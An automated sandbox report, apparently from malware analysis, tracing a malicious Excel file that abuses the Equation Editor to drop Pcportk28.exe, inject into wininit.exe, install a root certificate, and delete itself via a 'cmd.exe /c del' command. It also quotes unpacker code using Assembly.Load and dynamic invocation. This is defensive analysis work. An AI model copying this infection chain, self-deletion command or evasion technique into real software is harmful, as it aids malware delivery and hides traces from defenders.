          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E579A
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0086C7BC
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008957C3
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008DF8C4
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008FF8EE
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0086C85C
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0088286D
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0090098E
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008629B2
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008769FE
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E394B
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E5955
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00913A83
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0090CBA4
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E6BCB
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0085FBD7
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008EDBDA
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00887B00
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008FFDDD
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025D1238
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0252E2E9
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02537353
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0257A37B
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02532305
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025563DB
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0252F3CF
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025D63BF
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0254905A
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02533040
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0255D005
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0252E0C6
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0257A634
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025D2622
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0253E6C1
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02534680
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025657C3
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025B579A
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0253C7BC
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0256D47D
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025B443E
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02565485
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02541489
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02576540
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0253351F
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0254C5F0
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025E3A83
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02557B00
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025BDBDA
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0252FBD7
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025DCBA4
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0253C85C
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0255286D
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025CF8EE
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025B5955
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025B394B
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025469FE
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025D098E
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025329B2
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0254EE4C
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02562E2F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255DF7C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02540F3F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025A2FDC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CCFB1
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253CD5B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02560D3B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CFDDD
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FC948
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E8C80
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2D8A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2D90
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2FB0
          Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0259F970 appears 82 times
          Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 02573F92 appears 132 times
          Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0257373B appears 245 times
          Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0252E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0252DF5C appears 119 times
          Source: C:\Users\Public\Pcportk28.exe Code function: String function: 0085E2A8 appears 36 times
          Source: C:\Users\Public\Pcportk28.exe Code function: String function: 008CF970 appears 78 times
          Source: C:\Users\Public\Pcportk28.exe Code function: String function: 008A373B appears 214 times
          Source: C:\Users\Public\Pcportk28.exe Code function: String function: 008A3F92 appears 110 times
          Source: C:\Users\Public\Pcportk28.exe Code function: String function: 0085DF5C appears 105 times
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004185E0 NtCreateFile,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00418690 NtReadFile,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00418710 NtClose,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004185DA NtCreateFile,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041870B NtClose,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_008500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00850078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_008507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_008510D0 NtOpenProcessToken,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00850060 NtQuerySection,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_008501D4 NtSetValueKey,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0085010C NtOpenDirectoryObject,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00851148 NtOpenThread,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00851930 NtSetContextThread,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084F938 NtWriteFile,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FAB8 NtQueryValueKey,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FA20 NtQueryInformationFile,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FB50 NtCreateKey,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FC30 NtOpenProcess,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00850C40 NtGetContextThread,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FC48 NtSetInformationFile,
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00851D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_025200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_025207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02520048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02520078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02520060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_025210D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02521148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0252010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_025201D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02521930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02520C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02521D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F85E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F8690 NtReadFile,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F8710 NtClose,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F87C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F85DA NtCreateFile,
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F870B NtClose,
          Source: 7916.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msvbvm60.dll
          Source: C:\Users\Public\Pcportk28.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\Pcportk28.exe Memory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\Pcportk28.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\Pcportk28.exe Memory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exe Memory allocated: 76E90000 page execute and read and write
          Source: i4L[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Pcportk28.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Users\Public\Pcportk28.exe Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
          Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Users\Public\Pcportk28.exe Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$SWIFT - Copy - Copy.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR379.tmp
          Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/6@6/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
          Source: C:\Users\Public\Pcportk28.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Users\Public\Pcportk28.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: SWIFT - Copy - Copy.xlsx Static file information: File size 1400294 > 1048576
          Source: Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
          Source: Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp
          Source: SWIFT - Copy - Copy.xlsx Initial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: i4L[1].exe.2.dr, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: Pcportk28.exe.2.dr, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: i4L[1].exe.2.dr, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: Pcportk28.exe.2.dr, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: C:\Users\Public\Pcportk28.exe Code function: 4_2_010E9A2A push es; retf
          Source: C:\Users\Public\Pcportk28.exe Code function: 4_2_010E9767 push 3A000004h; retf 0000h
          Source: C:\Users\Public\Pcportk28.exe Code function: 4_2_010EA0FF push es; iretd
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041B822 push eax; ret
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041B82B push eax; ret
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041B88C push eax; ret
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004153E0 push es; retf
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00415C4E push ebp; ret
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041CD74 push eax; ret
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00414EAF pushad ; ret
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041CF70 pushad ; ret
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041B7D5 push eax; ret
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_010EA0FF push es; iretd
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_010E9A2A push es; retf
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_010E9767 push 3A000004h; retf 0000h
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0252DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F53E0 push es; retf
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FB7D5 push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FB82B push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FB822 push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FB88C push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F5C4E push ebp; ret
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FCD74 push eax; ret
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F4EAF pushad ; ret
          Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FCF70 pushad ; ret
          Source: initial sample Static PE information: section name: .text entropy: 7.09183457807
          Source: initial sample Static PE information: section name: .text entropy: 7.09183457807
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Pcportk28.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Pcportk28.exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Pcportk28.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
